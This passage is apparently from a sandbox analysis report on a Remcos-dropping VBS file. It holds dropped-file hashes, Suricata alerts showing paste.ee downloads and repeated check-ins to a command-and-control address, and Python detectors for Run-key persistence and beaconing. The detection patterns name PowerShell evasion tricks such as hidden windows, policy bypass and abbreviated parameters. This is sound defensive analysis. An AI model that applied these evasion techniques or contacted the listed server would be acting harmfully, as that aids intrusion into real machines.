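    ),
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r'%windir%\system32\SecurityHealthSystray.exe',
}

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# "-Comman", "-nop" or "-w" all work; a truncated name is a cheap evasion marker.
PS_PARAMS = ("-WindowStyle", "-ExecutionPolicy", "-Command", "-EncodedCommand",
             "-NoProfile", "-NonInteractive")

# (label, regex over the whole command line)
INDICATORS = [
    ("PowerShell launched through cmd.exe /c start /min",
     re.compile(r"cmd(\.exe)?\s+/c\s+start\s+/min", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-e(x|p|xec|xecutionpolicy)?\s+bypass", re.I)),
    ("dot-sources a .ps1 from the user profile",
     re.compile(r"\.\s+'[^']*\\AppData\\[^']*\.ps1'", re.I)),
    ("script stored under AppData\\Local\\Microsoft\\LocalLow", re.compile(r"\\LocalLow\\", re.I)),
]


def abbreviated_params(cmd):
    """Parameter tokens that are a proper prefix of a known PowerShell parameter."""
    found = []
    for tok in re.findall(r"(?<!\S)-[A-Za-z]+", cmd):
        for full in PS_PARAMS:
            if full.lower() != tok.lower() and full.lower().startswith(tok.lower()):
                found.append(f"{tok} (prefix of {full})")
                break
    return found


@dataclass
class Finding:
    name: str
    command: str
    hits: list


def assess_run_value(name, cmd):
    """Collect every indicator the command line matches."""
    hits = [label for label, rx in INDICATORS if rx.search(cmd)]
    hits += [f"abbreviated parameter {p}" for p in abbreviated_params(cmd)]
    return Finding(name, cmd, hits)


def suspicious_run_entries(values, min_hits=3):
    """Entries matching at least min_hits indicators (the threshold is an assumption)."""
    findings = (assess_run_value(n, c) for n, c in values.items())
    return [f for f in findings if len(f.hits) >= min_hits]


if __name__ == "__main__":
    for f in suspicious_run_entries(RUN_VALUES):
        print(f"[!] {f.name}")
        for h in f.hits:
            print(f"    - {h}")
```

On a live host the dictionary would come from `reg query` or `Get-ItemProperty` over both the HKCU and HKLM Run keys (and the 32-bit view the report lists as HKCU64); the scoring is deliberately independent of the value name, since "Update Drivers NVIDEO_vuw" is chosen to look legitimate.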
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9434
                                Entropy (8bit):4.928515784730612
                                Encrypted:false
                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                MD5:D3594118838EF8580975DDA877E44DEB
                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                Malicious:false
                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllulh49//lz:NllUu9//
                                MD5:AADE84B9650AB09D8DC304B168D6D555
                                SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                Malicious:false
                                Preview:@...e................................................@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                 (11 further dropped files with identical metadata omitted: same 60-byte size, same MD5/SHA1/SHA-256/SHA-512, same preview.)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.728944119173072
                                Encrypted:false
                                SSDEEP:48:K+DrlAtYf3CyGU2UphukvhkvklCywn0v+xLlHJZSogZoXUv+xLlLZSogZo71:njf3C0TGkvhkvCCt0WxLMHfWxLaHY
                                MD5:DA76809664DC3216A3E66BCBC985C45E
                                SHA1:DF54E7B02258490AFC5A740FADDF898247F6967D
                                SHA-256:932D1EAB4DADE9F6E097BD16C29EE03E8FC93345D0D5941918F2C5817C1500F1
                                SHA-512:BDDB4D1FD32D9B06F4D1D584F3C8A2FD4C010BCB3625331F1751CFBB2524C8D87493055D92EAF851BA4BA0A418A1B1BCBD80E00C7C5B01C94B88B4C7F1CCE5BC
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........
                                 (3 further dropped files with identical metadata omitted: same 6224-byte size, same MD5/SHA1/SHA-256/SHA-512, same preview.)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7283641905307636
                                Encrypted:false
                                SSDEEP:48:v5jDrlAtYf3CyGU2kDhukvhkvklCywn0v+xLlLZSogZoXUv+xLlLZSogZo71:vdjf3C0nMkvhkvCCt0WxLaHfWxLaHY
                                MD5:80F1E81DEDFC65944A9FFDCF948DB96E
                                SHA1:8BCDBEF4A597E07ABCD804EA122346F35C76C056
                                SHA-256:2F96E3E0FB00CB5F9BBFBB83795AF27B306090C63579104472E672D4FFDED520
                                SHA-512:CD04AE932581F208315B5C0CDE35F27D316E698963C3B1D75E291D1F0654EE97318ECBFBB6CF80E4AC668297522879F8FEBE44FF75C58EA103240EDCA8D65FE4
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S....@..e...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e....z4.e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2CY.;....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2CY.;....u...........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7287587846258963
                                Encrypted:false
                                SSDEEP:48:v5jDrlAtYf3CyGU2kDhukvhkvklCywn0v+xLlLZSogZoXUv+xLlLZSogZo71:v1jf3C0nMkvhkvCCt0WxLaHfWxLaHY
                                MD5:F6251D80387BE0C30B3F6BECA8BDC298
                                SHA1:AC92704641DF5A8B8339A2A8CE7A65DF9A9D5E8C
                                SHA-256:E53BE53663DDB58AE47FA4A854476FEA764041CE0968917E0E83D07A02E25CD3
                                SHA-512:8F7FB2AD9E3A0DA74C15FF29C8CF075938C704ECF2E900CAA7C9F6DB86B028708977BB6F2B398F8BC2865DAFF1B91CB44B24C0F3AA0D7D18CB626F20090CB366
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S....@..e...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....;.e.......e.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CY.;...........................^.A.p.p.D.a.t.a...B.V.1.....CY|;..Roaming.@......EW<2CY|;..../...................... ..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2CYy;....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2CYy;....2......................0#.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2CYy;....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2CYy;....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2CY.;....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2CY.;....u...........
                                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Entropy (8bit):3.493842135590996
                                TrID:
                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                • MP3 audio (1001/1) 32.22%
                                • Lumena CEL bitmap (63/63) 2.03%
                                • Corel Photo Paint (41/41) 1.32%
                                File name:SKMBT_77122012816310TD0128_17311_XLS.vbs
                                File size:605'916 bytes
                                MD5:9b36a3c24abb6bc8694e48e0c101c416
                                SHA1:6fd1c1c65d63f349734f2efcce64c88b3efd5e45
                                SHA256:7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15
                                SHA512:e22e5725ff50239c8df0ea9010ea389bdd79392dbcf01d65c9af5a32fd0084f501db879fcee5dfee0a2d02c9626d7d8f61abb240189d9fcf6ae00b1602298f64
                                SSDEEP:1536:rcccccccccccccccccq99999999999999999999999999999999999999999999n:J
                                TLSH:48D4C04627EA5A08B1B36F04AD7640745B6B3D1E9EBDC29C418DA85E1FF3910C861BF3
                                File Content Preview:..........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .m.e.x.i.c.a.n.o. .'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. .........'. .P.r.i.n.t. .u.s.a.g.e. .b.a.S.T.o.....'.............'. .I.n.s.t.a.l.l. .P.r.o.v.i.d.e.r.s.................'. .U.n.i.n.s.t.a
                                Icon Hash:68d69b8f86ab9a86
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-03T09:28:12.500205+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649713188.114.97.3443TCP
                                2024-10-03T09:28:18.472783+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649717188.114.97.3443TCP
                                2024-10-03T09:28:18.472783+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649717188.114.97.3443TCP
                                2024-10-03T09:28:19.798901+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11173.231.247.100443192.168.2.649719TCP
                                2024-10-03T09:28:19.798901+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11173.231.247.100443192.168.2.649719TCP
                                2024-10-03T09:28:22.004816+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649722188.114.97.3443TCP
                                2024-10-03T09:28:22.004816+02002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649722188.114.97.3443TCP
                                2024-10-03T09:28:24.687917+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649725212.162.149.1632404TCP
                                2024-10-03T09:28:27.202095+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649726212.162.149.1632404TCP
                                2024-10-03T09:28:29.719551+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649729212.162.149.1632404TCP
                                2024-10-03T09:28:32.237386+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649730212.162.149.1632404TCP
                                2024-10-03T09:28:34.741502+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649731212.162.149.1632404TCP
                                2024-10-03T09:28:37.263282+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649733212.162.149.1632404TCP
                                2024-10-03T09:28:39.737467+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649734212.162.149.1632404TCP
                                2024-10-03T09:28:42.259851+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649735212.162.149.1632404TCP
                                2024-10-03T09:28:44.783981+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649736212.162.149.1632404TCP
                                2024-10-03T09:28:47.323437+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649737212.162.149.1632404TCP
                                2024-10-03T09:28:49.811942+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649739212.162.149.1632404TCP
                                2024-10-03T09:28:52.327187+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649740212.162.149.1632404TCP
                                2024-10-03T09:28:54.811710+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649741212.162.149.1632404TCP
                                2024-10-03T09:28:57.327488+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649743212.162.149.1632404TCP
                                2024-10-03T09:28:59.820733+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649744212.162.149.1632404TCP
                                2024-10-03T09:29:02.359457+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649745212.162.149.1632404TCP
                                2024-10-03T09:29:05.060314+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649746212.162.149.1632404TCP
                                2024-10-03T09:29:07.515008+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649747212.162.149.1632404TCP
                                2024-10-03T09:29:10.000254+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649748212.162.149.1632404TCP
                                2024-10-03T09:29:12.471874+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649749212.162.149.1632404TCP
                                2024-10-03T09:29:14.936735+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649750212.162.149.1632404TCP
                                2024-10-03T09:29:17.407502+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649751212.162.149.1632404TCP
                                2024-10-03T09:29:20.092592+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649753212.162.149.1632404TCP
                                2024-10-03T09:29:22.827305+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649754212.162.149.1632404TCP
                                2024-10-03T09:29:25.344002+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649755212.162.149.1632404TCP
                                2024-10-03T09:29:27.843037+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649756212.162.149.1632404TCP
                                2024-10-03T09:29:30.326918+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.649757212.162.149.1632404TCP
2024-10-03T09:29:32.828638+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49758  212.162.149.163  2404  TCP
2024-10-03T09:29:35.280034+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49759  212.162.149.163  2404  TCP
2024-10-03T09:29:37.799854+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49760  212.162.149.163  2404  TCP
2024-10-03T09:29:40.301582+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49761  212.162.149.163  2404  TCP
2024-10-03T09:29:42.814455+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49762  212.162.149.163  2404  TCP
2024-10-03T09:29:45.358366+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49763  212.162.149.163  2404  TCP
2024-10-03T09:29:47.811790+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49764  212.162.149.163  2404  TCP
2024-10-03T09:29:50.284883+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49765  212.162.149.163  2404  TCP
2024-10-03T09:29:52.720677+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49766  212.162.149.163  2404  TCP
2024-10-03T09:29:55.092566+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49767  212.162.149.163  2404  TCP
2024-10-03T09:29:57.420650+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49769  212.162.149.163  2404  TCP
2024-10-03T09:29:59.923538+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49770  212.162.149.163  2404  TCP
2024-10-03T09:30:02.330484+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49771  212.162.149.163  2404  TCP
2024-10-03T09:30:04.608519+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49772  212.162.149.163  2404  TCP
2024-10-03T09:30:06.843533+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49773  212.162.149.163  2404  TCP
2024-10-03T09:30:09.080687+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49774  212.162.149.163  2404  TCP
2024-10-03T09:30:09.446203+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49774  212.162.149.163  2404  TCP
2024-10-03T09:30:12.762607+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49775  212.162.149.163  2404  TCP
2024-10-03T09:30:15.640291+0200  2032776  ET MALWARE Remcos 3.x Unencrypted Checkin  1  192.168.2.6  49776  212.162.149.163  2404  TCP
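The check-in alerts above fire on a fresh TCP connection roughly every 2.5 seconds to the same 212.162.149.163:2404, which is the kind of regularity a beaconing detector keys on. The following Python script is an added example, not part of the Joe Sandbox report or of Remcos: it parses the 19 alert rows above (copied into the script as pipe-delimited text in the report's column order), collapses alerts that hit the same TCP connection (the two rows from source port 49774 are one connection), and flags per (source, destination, port, signature) group whose inter-arrival times have a low coefficient of variation. The thresholds `min_conns=5` and `max_cv=0.25` are assumptions chosen for illustration, not values from the report.

```python
"""Beacon regularity check over Suricata alert rows (added example)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Rows copied from the report's Suricata alert table, in the report's column
# order: Timestamp|SID|Signature|Severity|Source IP|Source Port|Dest IP|Dest Port|Protocol
ALERT_TABLE = """\
2024-10-03T09:29:32.828638+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49758|212.162.149.163|2404|TCP
2024-10-03T09:29:35.280034+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49759|212.162.149.163|2404|TCP
2024-10-03T09:29:37.799854+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49760|212.162.149.163|2404|TCP
2024-10-03T09:29:40.301582+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49761|212.162.149.163|2404|TCP
2024-10-03T09:29:42.814455+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49762|212.162.149.163|2404|TCP
2024-10-03T09:29:45.358366+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49763|212.162.149.163|2404|TCP
2024-10-03T09:29:47.811790+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49764|212.162.149.163|2404|TCP
2024-10-03T09:29:50.284883+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49765|212.162.149.163|2404|TCP
2024-10-03T09:29:52.720677+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49766|212.162.149.163|2404|TCP
2024-10-03T09:29:55.092566+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49767|212.162.149.163|2404|TCP
2024-10-03T09:29:57.420650+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49769|212.162.149.163|2404|TCP
2024-10-03T09:29:59.923538+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49770|212.162.149.163|2404|TCP
2024-10-03T09:30:02.330484+0200|2032776|ET MALWARE Remcos 3.x Unencrypted Checkin|1|192.168.2.6|49771|212.162.149.163|2404|TCP
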